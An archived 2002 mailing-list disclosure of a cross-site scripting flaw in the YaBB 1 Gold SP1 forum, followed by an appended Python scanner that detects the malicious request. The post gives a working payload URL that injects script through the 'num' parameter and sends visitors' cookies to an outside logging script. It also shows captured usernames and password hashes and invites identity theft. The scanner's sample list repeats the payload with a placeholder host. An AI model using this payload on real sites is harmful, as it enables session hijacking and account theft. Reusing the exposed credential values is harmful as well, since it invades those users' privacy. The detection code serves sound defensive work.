Cross-site Scripting Vulnerability in YaBB 1 Gold - SP1!

From: Fabricio Angeletti (f_a_aat_private)
Date: Sun Dec 01 2002 - 16:59:01 PST


     
    http://the.target.xxx/board/YaBB.pl?board=gral;action=display;num=10360245269>location%3d'http://www.scriptkiddie.home/x.php?Cookie%3d'%2b(document.cookie)%3b</Script>
    
     num is a post that doesn't exist
     board must be a valid and accessible board
     X.php script to log the cookie
    
     that is an example of the cookie
     268: YaBBusername=HellMind;
    YaBBpassword=yyG8B.3TA6i6I
     272: YaBBusername=Canallaman;
    YaBBpassword=yypZn/JbGHTNY
    
     Tested in  YaBB 1 Gold - SP1!
    
     I discovered this just now. I know it isn't much, but you can
     steal the user's identity and maybe you can try to change
    the password too (there is another old vuln but I don't
    know if it works here)
    
     Sorry for my bad English
    
     Bye
    
    
    
    



    This archive was generated by hypermail 2b30 : Mon Dec 02 2002 - 09:05:09 PST
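
A defensive check for the request shape shown in this post, as an added example that is not part of the original message or of YaBB's own code: it parses YaBB.pl's `;`-separated query string, flags any `num` value that is not a plain numeric post id, and shows the HTML-escaping a handler would apply before echoing the value back. The digits-only rule for `num`, the function names, the sample requests and the host `collector.example` are assumptions constructed for illustration.

```python
import html
import re
from urllib.parse import unquote, urlsplit

# Assumption: a legitimate `num` (post/thread id) consists of digits only.
NUM_OK = re.compile(r"\d{1,20}")

# Constructed sample request lines (not real logs); the second mirrors the
# request shape from the post with a placeholder host.
SAMPLE_REQUESTS = [
    "/board/YaBB.pl?board=gral;action=display;num=1036024526",
    "/board/YaBB.pl?board=gral;action=display;num=10360245269>location%3d"
    "'http://collector.example/x.php?Cookie%3d'%2b(document.cookie)%3b</Script>",
]


def yabb_params(url):
    """Split a YaBB.pl query string, whose pairs are separated by ';' (or '&')."""
    params = {}
    for pair in re.split(r"[;&]", urlsplit(url).query):
        key, _, value = pair.partition("=")
        if key:
            params[unquote(key)] = unquote(value)
    return params


def suspicious_num(url):
    """Return the decoded `num` value if it is not a plain id, else None."""
    num = yabb_params(url).get("num")
    if num is None or NUM_OK.fullmatch(num):
        return None
    return num


def safe_reflect(value):
    """HTML-escape a value before it is echoed into a page (e.g. an error page)."""
    return html.escape(value, quote=True)


def scan(requests):
    """Return (request, decoded num) for every request that should be reviewed."""
    hits = []
    for req in requests:
        bad = suspicious_num(req)
        if bad is not None:
            hits.append((req, bad))
    return hits


if __name__ == "__main__":
    for req, bad in scan(SAMPLE_REQUESTS):
        print("review:", req)
        print("  escaped form:", safe_reflect(bad))
```

Rejecting a non-numeric `num` at input and escaping on output are independent controls; the scan function can also be run over archived access logs to find past requests of this shape.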